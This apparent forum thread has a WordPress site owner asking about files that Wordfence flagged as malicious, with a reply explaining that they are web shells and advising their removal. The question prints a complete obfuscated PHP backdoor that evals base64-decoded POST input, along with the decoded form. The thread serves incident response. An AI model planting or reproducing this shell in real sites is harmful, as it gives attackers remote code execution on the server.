I have just run the plugin Wordfence and it gave me some issues to fix.
There are two groups with the same suspucious code:
File appears to be malicious: wp-admin/cache/alias90.php
File appears to be malicious: wp-content/languages/plugins/title.php
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php
File appears to be malicious: wp-content/uploads/2013/start24.php
The description says: This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@$GLOBALS[$GLOBALS[‘y23c’][67].$GLOBALS[‘y23c’][76].$GLOBALS[‘y23c’][76]”.
And the second group:
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected
Where the description is: This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “strtolower($sF[4].$sF[5].$sF[9]”.
What should I do with those files? Are they actually malware?
EDIT: The files from the second group have this code
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n726b60'])) {
eval($s21(${$s20}['n726b60']));
}
?>
EDIT2: I evaluated that code and its returning this:
base64_decode($_POST['n726b60']);
Is this something dangerous?
It is a shell that is used to run malicious code on your server. They are uploaded to your server generally through online bots that scan sites for vulnerable wordpress plugins. Essentially, the shell code allows them to run code based off input of a
$_POSTvariable by using theevalfunction.I have encourtered this on a clients wordpress site where they had a mass amount of unnecessary plugins that should have been disabled + deleted.
I would seriously consider checking all of your wordpress plugins through google and see if you can find any vulnerabilities posted publicly. Also, try go through all directories and delete files similar to these.